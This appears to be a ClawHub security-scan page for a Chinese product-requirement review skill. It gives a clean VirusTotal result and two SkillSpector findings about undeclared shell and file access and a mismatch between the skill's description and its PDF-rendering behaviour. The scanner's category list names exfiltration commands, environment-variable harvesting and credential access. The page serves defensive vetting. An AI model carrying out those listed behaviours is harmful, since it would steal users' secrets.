ClawHub

产品需求大法-评审沙盘

Security checks across malware telemetry and agentic risk

Overview

This skill is a product-requirement review helper with a disclosed local PDF renderer and no evidence of hidden data access, persistence, exfiltration, or destructive behavior.

Install if you want a Chinese product-requirement review workflow. Before generating PDFs or Feishu documents, confirm the input and output paths and which Feishu account/document is being used, especially for confidential product plans.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • MCP Least PrivilegeUnderdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
Findings (2)

Lp3

Medium
Category
MCP Least Privilege
Confidence
89% confidence
Finding
The skill instructs the agent to use local scripts and shell commands to render Markdown into PDF, which implies shell execution plus file read/write without any declared permission boundary. That mismatch is dangerous because a seemingly documentation-only skill can access the environment and filesystem, increasing the risk of unintended file access, command execution, or abuse if downstream content is adversarial or user-controlled.

Tp4

High
Category
MCP Tool Poisoning
Confidence
94% confidence
Finding
The skill is presented as a product-review workflow, but it also drives local document conversion and PDF rendering tooling such as scripts, Node.js, and Playwright/Chromium. This description-behavior mismatch is risky because users and reviewers may trust it as a pure content-generation skill while it actually performs code-adjacent operations with filesystem and process execution side effects.

VirusTotal

65/65 vendors flagged this skill as clean.

View on VirusTotal